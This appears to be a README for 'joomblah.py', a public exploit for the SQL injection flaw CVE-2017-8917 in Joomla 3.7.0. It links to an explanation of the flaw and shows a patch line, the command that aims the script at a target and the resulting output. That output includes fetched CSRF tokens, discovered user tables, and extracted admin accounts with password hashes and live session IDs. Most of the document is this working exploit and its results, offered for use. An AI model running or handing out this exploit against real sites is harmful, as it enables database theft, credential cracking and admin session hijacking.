Exploit for Joomla 3.7.0 (CVE-2017-8917)
Explanation about the vulnerability:
https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
Modification in line 46
...
result += value.decode('utf-8')
...Point the joomblah.py script at the vulnerable Joomla 3.7.0 install, it may take some time, but it will dump the users and session tables.
$ python joomblah.py http://127.0.0.1:8080
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: rlbre_users
- Found table: tgukl_users
- Extracting users from rlbre_users
[$] Found user ['361', 'Super User', 'admin', '[email protected]', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
- Extracting sessions from rlbre_session
[$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
- Extracting users from tgukl_users
[$] Found user ['883', 'Super User', 'admin', '[email protected]', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
- Extracting sessions from tgukl_session
Licenced under the WTFPL Credits Original code by @XiphosResearch